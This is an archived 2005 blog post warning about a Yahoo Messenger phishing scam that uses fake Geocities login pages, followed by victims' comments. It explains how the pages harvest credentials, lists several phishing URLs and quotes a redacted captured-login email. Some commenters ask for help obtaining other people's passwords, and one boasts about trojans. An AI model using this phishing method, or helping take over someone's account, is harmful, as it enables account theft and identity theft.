<$BlogRSDUrl$>
 

zigzackly's omnium-gatherum *

Quid quid latine dictum sit, altum videtur

Reactions, suggestions, any kind of feedback is always welcome.

Recent Posts
Delhi Blasts - 2
Opportunism
Delhi bomb explosions
Alea jacta est. Nunc est bibendum
We have a swollen head, we do.
And now for the audio-visual round
Join the dots
Chennai update
The Chennai floods
More on IIPM v/s the blogs

D Mervin Ffingir writes, and having writ, moves on:
September 2003 | December 2003 | January 2004 | February 2004 | March 2004 | April 2004 | May 2004 | June 2004 | July 2004 | August 2004 | September 2004 | October 2004 | November 2004 | December 2004 | January 2005 | February 2005 | March 2005 | April 2005 | May 2005 | June 2005 | July 2005 | August 2005 | September 2005 | October 2005 | November 2005 | December 2005 | January 2006 | February 2006 | March 2006 | April 2006 | May 2006 | June 2006 | July 2006 | August 2006 | September 2006 | October 2006 | November 2006 | December 2006 | January 2007 | February 2007 | March 2007 | April 2007 | May 2007 | June 2007 | July 2007 | August 2007 | September 2007 | October 2007 | November 2007 | December 2007 | January 2008 | February 2008 | March 2008 | April 2008 | May 2008 | June 2008 | July 2008 | August 2008 | November 2008 | December 2008 | January 2009 | March 2009 | April 2009 | May 2009 | June 2009 | July 2009 | August 2009 | September 2009 | November 2009 | December 2009 | January 2010 | February 2010 | March 2010 | June 2010 | July 2010 | August 2010 | October 2010 | November 2010 | December 2010 | January 2011 | February 2011 | March 2011 | April 2011 | May 2011 | August 2011 | September 2011 | December 2011 | February 2012 | March 2012 | August 2012 | December 2012 | April 2013 | August 2013 | November 2013 | April 2014 |



Sunday, October 30, 2005
Yahoo password hack warning 

Actually, make that:

Yahoo Messenger password scam warning



Note: I have kept the earlier, inaccurate, post title because this post gets a lot of traffic via search and has been linked to here and there, so I don't want to change the permalink. Though I hope the subhead in larger type makes things clearer.

It happens via Yahoo messenger.

You get a message, apparently from someone on your list. So far, I haven't been able to check if it's someone who's fallen for this, and whose account is being used, or a spoofed send.

The message is something along the lines of "see my new pictures." With a Geocities link. When you go to the link, even if you don't know that Geocities is a home page provider and that it was bought over by Yahoo many years ago, you see the reassuring "yahoo" in the URL, a Yahoo logo alongside the Geocities logo, and what looks like a Yahoo photos page that asks you to log in before you can proceed. All the links work, and go to genuine Geocities sign up, Terms and Conditions, Privacy Policies, etc. Except that you don't need a password to view a Geocities page. (Well, yes, you might, if the page owner has locked some pages behind a javascripty thingy or summat, but you won't need yo put in your Yahoo password.)

Proof? Just dump in any arbit name and password. It will seem to accept it (if you look quickly at your status bar, you'll see the page sending to another site).

Just a little while ago, I got what looked like a message from a pal. It didn't sound like him in the least, so my antennae were up. (Besides, a friend told me a few days ago she'd just got hit by a password-stealer, so I guess I was a little wary.)

Clicked the link, and it was as I described it above. Here it is: http://www.geocities.com/hot_pretty_belle/

And in case it's not up, here's a screen grab:



I did a little "view source" and here's what the form looks like underneath the hood. (I have the complete page saved, if one of you techwizards wants it. Just get in touch.)

*see update 2 below


(If the code in the image doesn't make sense to you, here's the skinny: when you hit "enter", the page sends your Yahoo ID and password to hot_pretty_belle, or whoever else has set up the page.)

Now that you know, want to have a little fun? Fill in username and password fields with language mama would have washed your mouth out with soap for. And hit enter. hot_pretty_belle (or whoever you next encounter trying this stunt) will get lots of piping hot email.

Be warned. You'll get another page offering you another sign in button. And a Sign Up button, which, on click, gives you a genuine-looking Yahoo sign up page. Just loook up at the URL. Too tired to go see that bit of source code now, so will leave it to you tech-adepts.

I'm going to wait a day before reporting this to Yahoo, so go send that hot_pretty_belle your love!

And do pass this on. No, you don't need to credit me. Well, if you insist. I'm a slut for link love.

Update 1

Did a bit of research, and found out what happen if you enter a genuine Yahoo ID and password and click through.

The page records your ID and password, then forwards you to the real Yahoo Photos site. You (: if you hadn't read this :) would have just muttered imprecations about the dorkiness of the pal who didn't give you proper links.

And a few minutes later, you would have got a message from Y!M saying "You have been signed off Yahoo because you signed in from another location."

This has been happening quite often, so it's not much point remembering specific URLs, like hot_pretty_belle. Just remember the method.

Update 2

Thanks to ViswaPrabha and Prashanth, who told the doofus - me - that even with angle brackets html-ised to show up on the page, the script would send comments on this post (and possibly blogger ID and password! shudder!) to the black hats who run the page I referred to. So, text removed and replaced with an image, and now it will behave like a normal, harmless blogger page.

I, for once, am glad that no one commented!

Many Thanks, VP and Prashanth.

Update 2 - 9th July 2006
Please see this diary entry at SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System and this entry on the McAfee Avert Labs Blog. The SANS page points out a development that didn't exist when I wrote this post:
The last interesting thing is related to obfuscation of the HTML. The attacker decided to use a product called HTML Protector. This tool basically just obfuscates HTML code using JavaScript but as a browser needs to be able to parse the HTML code, the unobfuscation function always has to be present, so with some spare time you can easily unobfuscate this.
And the McAfee page points to this discussion on Broadband Reports, which also mentions the encrypted page.

Blogged for thee by @ 2:43 am | 34 Comments | Post a Comment | Link Love? |



34 Noble Readers have commented.

  On Tuesday, 8 November 2005 10:37:00 GMT+5:30, the Hon'ble Anonymous R said...

This was done to me a few months ago. Clever little scam.

Fortunately I was able to contact yahoo and get my username back.


It is a very simple hack. I manipulated the code a little to try to mimick the results. What it does is use a third-party emailer and emails the scammer whatever is put in the username/password field.

When I fell for it, I remember thinking to myself "hmm geocities..thats odd...oh wait they were bought by Yahoo a while back. hehe stupid me

  On Tuesday, 15 November 2005 01:14:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

I'm wondering on the geocities password stealer can they get your ip even if you've put in something like.....you/suck for the s/n and pass?
Thanks!!!

  On Friday, 2 December 2005 10:16:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Hi Every 1 out there am Nisha here n am in here facing a problem from a guy whoz id is aqqthu@yahoo.com i just need some help from u guys as just to let me know who this person is or by getting his password for me i"ll be very thankful to you as for ur favour if u can please do send me a mail to maria_was_here@yahoo.com

  On Friday, 6 January 2006 21:47:00 GMT+5:30, the Hon'ble Blogger Anjul said...

http://beauty.trap17.net/pics/ is another such link people.. although this time the hacker got clever enough to use php for his dirty work. A friend of mine got her password hacked this way, I'm trying to know the identity of the offender (probably someone from my hostel). If there's any information do comment/shout anywhere on my blog.
Thanks!

  On Tuesday, 7 February 2006 20:18:00 GMT+5:30, the Hon'ble Anonymous Bill said...

Hi, Folks/ I had my Yahoo hacked this way! Very upsetting. Yahoo has not been helpful. If you can help me get my account back, I would be very grateful. Pls email me at colbyut@yahoo.com Thank you.

  On Sunday, 12 February 2006 21:55:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

And yet another scam site! DO NOT use a valid username and password if you want to examine the source code on this page.

http://www.geocities.com/my_crazy_partie_pics/

  On Thursday, 2 March 2006 00:24:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

I too got my Yahoo Id stolen, I have this id for 7yrs, Yahoo security isn't much help at all. I know they need this info to acces your account, but as i said i signed up for my account 7yrs ago never changed the password, now i can't get my account back until i can remeber the answer to my secret question. If any one has any ideas on how i can get my Id back please let me know. I always see this person come online with my screen name and they try sending me the same link.

  On Friday, 19 May 2006 21:28:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

This is for those who forgot the answer to their secret question ... Call up yahoo on (408) 349-3300.

They can help you there.. I lost my password that way too,. they changed it for me and gave me the password. I had to verify the birthdate though.. see if that helps.

For those who dont belive the phone number you can get it by searching for Yahoo on google maps.

  On Friday, 11 August 2006 00:38:00 GMT+5:30, the Hon'ble Anonymous Gilson said...

Hey hi my Name is Gilson as iam too the victim of the hacker. So please let me know any other solution than the phone. My yahoo id starboy21century@yahoo.co.in. Thanks in advance i hope you guys can get the solution and give a slap to this Fucking hackers.

Regards,
Gilson

  On Tuesday, 15 August 2006 20:48:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Hi! my name is Vivek. I got my passowrd hack by some geocities link. Please help me to recover my passowrd. I made this account some 9 yrs back and dont remember the information I gace that time.please send me suggestion to whooammii26@yahoo.com. Thanks,Vivek

  On Wednesday, 16 August 2006 21:26:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Even same thing happened to me yest. now i cant access my account.
Please help me n let me know how i can get my account again.please mail me on v_lara2001@yahoo.co.uk

  On Friday, 18 August 2006 09:24:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

I am one of the latest hit, the link used nowadays is "http://www.geocities.com/hott_new_pics_for_you28". As per yahoo's site, I should get a alternate id to send the pwd, but I do not get on my screen. Can anybody help, please send suggestions to don_i@india.com

  On Sunday, 20 August 2006 23:40:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Mine was hacked this morning.I checked early in the morning.it was fine. But when I tried now, its gone.I rememember I got such a geocities link in my messenger from a known contact and clicked on it. But that was 2 weeks back. One of my friends on the ym list told me that he's been getting such links from my ym id for the past 2-3 weeks.

  On Wednesday, 23 August 2006 21:27:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

haiii all if u have problem with your yahoo account just call them at : 866-5627219 i just did that, and they asking a couple questions

don't worry if you forgot everything they can help u. no hope if you try to contact them from their email (feedback form) i did that for 2 weeks every 2days, and no answers at all.

now i get my id back :D

  On Friday, 25 August 2006 20:04:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Hi, Thanks for your reply. Could you tell me to which country the number belongs to. Thanks!

  On Sunday, 27 August 2006 14:11:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

hi frds,someone has stolen my yahoo id.i tried my password bt it doesn't work.i forgot my hint answer also.so pls help me to got my password.that yahoo id was very confidencial .if anyone knows the solution lps mail me to manofattraction@gmail.com.

  On Friday, 15 September 2006 14:49:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Doggoneit! It just caught me after many years of careful living online. Link from a colleague in YIM! A geocities.com page (a Yahoo! property). Yahoo! Photos login. And the second login. Argh! I immediately dived in and changed my Yahoo! password. Twice. In quick succession. Repeated login / logout seems to confirm that I managed to change my password *before* the scammer nailed my account. But it sure made me nervous. Nervous enough to go change a whole bunch of other username / password combos I use online.

  On Sunday, 8 October 2006 21:33:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

i am not abble to access my yahoo mesenger id,plz help.
my yahoo id is con_ravi_jeet@yahoo.co.in,

password hacked by someone plzz tell me
how to get
on con_ravijeet@rediffmail.com

  On Tuesday, 10 October 2006 03:29:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

hii all,i'd like to tell you that my password was hacked by that bad page of yahoo photos,and finally i just tried to call the customer care for yahoo.com by phone and they were realy so wonderful and patient, here is the phone number from an international phone:(0018665627219),then choose from menu..press number 2..then the next menu number 2 again.. then you will talk to someone form the customer care team.and they will help you and reset your password and sned it to your mail.you will get your password believe me.then and tell me all you guys onmy mail:mgmgsan81@yahoo.com
i wish all you got your lost passwords.. and good luck dears.

  On Thursday, 12 October 2006 20:22:00 GMT+5:30, the Hon'ble Blogger Buddy said...

My wife's yahoo name was blocked by the phishing scam everyone is talking about. Supposedly, Yahoo will help you get the name back, but really they won't and they don't f'''ing care!

She has had this name for almost 10 years. At the time when she got it, nothing in Yahoo's site said the personal info was going to be confidential.... SO... she used a fake D.O.B. and zip code info. Well, gee,, who would have thought someone would hack her and she would need to have remembered this stuff?

My wife is an adult film actress and she has thousands of fans, many of which talk with her on messenger. She really needs the name back. Yahoo won't help, even though they can just send the changed password to her alternate email address she has had since she opened the account. Also, she has her online status indicator on her official website etc. which also lists the same alternate email address.

I would really like to find someone who would be willing to help us get her chat name back. I know I will have to get her hacked just to get her back into her own chat name, but what else can I do?

Buddy

  On Sunday, 22 October 2006 12:14:00 GMT+5:30, the Hon'ble Anonymous LAB said...

yes yahoo does not care if someone steals your account inless it is a pay account.. is all about the money.. and they arnt all geocities sites.. you can make them like www.photos.yahoo.tk or hell even buy the domain www.photos-yahoo.com i saw a thing asking about if they can get your ip even if u put the wrong info in.. yes they get it isp and ip.. here is example of the email that the sender gets back..

送信元ホスト名: cpe-00-00-4-190.socal.res.rr.com / 00.00.4.190

送信元ブラウザ: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)

送信元URL : http://www.edited.com

login = browneyeddoll007
passwd = XXXXX

ip isp url and pw all edited.. many use these to get so called illegal id's ones that can no longer be made on yahoo ___name___ name-name or with + any other symbols because they can be sold for cash..

  On Friday, 17 November 2006 15:52:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Hey... I entered into some like that only it was ymail.sytes.com or something and Now i cant acces my email... please can someone get it my account back its vveerryy important.. my yahoo id is romania222001

  On Saturday, 18 November 2006 04:53:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

i was receiving numerous im's and im computer phone calls from |||nick_the_nugget||| and another screen name he was using notifying me it was nick_the_nugget (the first part i cannot remember, all i can remember is brunnette_69_2000). i ignored his requests several times, and he said he knew i was online because my ip was active. he then said he was going to "delete something". suddenly my messenger logged out and said i was logged into another computer. i tried to log back in, but my password had been changed. i was also unable to access my account to change the password.

he has been going through my contact list and sending instant messages, phone call messages, and sending emails telling everyone he is going to capture their ids.

a friend on my contact list, saw that my id was lit up, so she thought i was online. she sent an im, and it was the guy who hijacked my account. he told her my account had been "captured", told her he had her ip address, and told her he was going to delete her account.

this guy has also left a voice mail message with another friend of mine telling her i was "chatting with his 13 year old cousin in a chat room", then he went on to say fowl things. she said he sounded very young and very creepy.

my mother sent an im to my im, and the guy responded to her via computer phone call in instant messenger. he said his name was nick from atlanta, ga and he hijacked my account. he told her i was "mean to him in a chat room" (which is a lie), and then started cursing at her "f" this "f" that. then he told her he had her ip address. today, she is unable to log into her account.

i have personal (including medical, bills, home address) and company information stored in my yahoo email, and i am afraid he will go further with identity theft.

i would really like to see this got caught and brought to justice. there is no telling how many people's identities and personal information he has stolen.

Here are his online profiles:

http://profiles.yahoo.com/llllnick_the_nuggetllll

http://www.myspace.com/ncfleet

he also has the following yahoo ids:
fleetwood181987
ncfleet18

he has a yahoo 360 account as well.

  On Tuesday, 21 November 2006 02:08:00 GMT+5:30, the Hon'ble Anonymous Claire said...

hi recently my yahoo id was also hacked, and some of my information was changed and i couldn't get to where i could enter my secret answer
so i called yahoo customer care at 1-408-349-1572 and talked to Miranda she was very nice and helpful with her help i was able to get back my account by answering a few questions and telling her what had happened, do not ever click on links in yahoo they are scams to steal your id and password i know this is not good advice if you've already done so as i did..if anyone would like to contact me to see if maybe i can help you may do so at mysterywoman4u@hotmail.com

  On Tuesday, 21 November 2006 11:24:00 GMT+5:30, the Hon'ble Anonymous ___.-UnKnowN-.___ said...

Those geocities and freewebs. ect. links where fake logins... or trojans. wich you simply upload. you send them the link. they open it.. boom. there computer is trojaned.. that would get every password they typed in there messenger.. ahaha. soooooo You did a lil help with those fake logins. but trojans. never will be gone... they will be rescrypted. Try to scan a file? wouldn't work! a few, best ones. are undetechabele!.lol. So yea.. Owner/admin/mod. whoever. can get my ip. report me.. w,e...lol... Why? cuss i didn't harm no one. actually i gave ya bitches advice..lol... and the fake logins. will come alive once again. with a new script. with that new yahoo shit...lol and there is no such thing as yahoo hackers. unless someone controls ur pc with sub-7/optix-pro/pro-rat/ect/ect... LMFAO. this fake logins thing. is not called being "hacked". How old are ya? you guys are like 20-30. yall sound like lil retarded kids. this is nothing... most poeple had use this for illegal names... There are hundreds of this geocity sites...and there's alot of different ways to get ur id owned.. this gay sites.. trojan.. cracked... info cracked... exploited... and way more waysss.. yes i learn this new trick lesss then a weak ago.. amazing how LimeWire.. BearShare... all those nice programs can help you get passwords..lol... But yeaa....... Amazin how am only 14 years old? and i know alot moreee then ya old poeple. ..lol.. God Bless You!.
__
Yo soy el magnifico travieso
_
Je suis sexy. chienne!.
_
lol.....

  On Wednesday, 22 November 2006 19:16:00 GMT+5:30, the Hon'ble Blogger Dancing Budhha said...

Can someone help me. It happened to me a day before yesterday. I logged in to YM and saw this thing "see my latest pictures". I clicked and did the same mistake as mentioned. Now, I have not been able to access my own yahoo account since morning jbareria@yahoo.com. I also maintain my own website: www.geocities.com/jbareria Now, my yahoo account doesn't work. Please help, unfortunately I am not able to recollect what all info I gave when I regsitered 7 years ago thus there is no way I can get my password back. Could someone suggest some option.. Please help, I can't afford to loose all my personal info stored at yahoo for last 7 years.

-Jyotirmay Bareria
jbareria@motorola.com

  On Thursday, 23 November 2006 10:50:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

I hae also fallen victim to the above mentioned happenings. I lost my yahoo Id. which i found out is actually worth money because I signed up 7 years ago before they had the _ rule. my id is/was _The_Pawn If anybody knows of a way or can help e-mail me @ jkgreve@earthlink.net. tia

  On Thursday, 25 January 2007 11:41:00 GMT+5:30, the Hon'ble Blogger Optikal said...

I think anyone signing into a geocities site with their yahoo ID's are asking for problems. Do not accept files from people you don't know. Do not log into anything using your main yahoo ID. Only log into yahoo using your yahoo ID. If somehow you slipped and now have lost your ID, ask yahoo for it back - Provide enough information about your ID ie how often you use the account, who is on the friends list and so on.. They will give it back to you despite the fact the attacker has changed your account information.

  On Monday, 5 February 2007 20:03:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

My yahoo acount hacked and My password has been changed. plz help me to get the passwords so that i can change it back and details. My IDs are duraygo1@yahoo.com,which i have singned in up for a very long time ago,in the messenger the some of the people there are,luvmenow_2001@yahoo.com,luvmenow@yahoo.com.please you can send the password to owoyemi_deji@yahoo.com if you get it please.

  On Tuesday, 13 March 2007 20:51:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

plz help me to recover my password of nehaa75@yahoo.com and plz send me at wess42@hotmail.com

  On Friday, 16 March 2007 09:20:00 GMT+5:30, the Hon'ble Blogger Neeci said...

Funny enough my Yahoo account got hacked. I had to start going to every site that had my yahoo address and change them all. Creepy, very creepy.

  On Tuesday, 27 March 2007 19:56:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

the web is not meant for dummies

  On Tuesday, 12 June 2007 01:53:00 GMT+5:30, the Hon'ble Anonymous annerose said...

These comments have been invaluable to me as is this whole site. I thank you for your comment.

  On Thursday, 13 September 2007 00:35:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

quite often when I start to log off I get a message saying I am logged on at a remote computer, and shutting down will close that connection as well, I didn't realize was what was happening. I think I know who is doing it, and I did know that persons yahoo password, now it has been changed and I found out today mine had been hacked in to. I sure would like to check his, to see what he has taken from mine, but I don't know how to do the technical stuff. We got to be careful.

Post a Comment

Kind souls who have linked to this post include:

Create a Link

< < Home < <




Note: [*] = The site linked to requires registration.

This page is powered by Blogger. Isn't yours?


Creative Commons License
This work is licensed under a
Creative Commons License.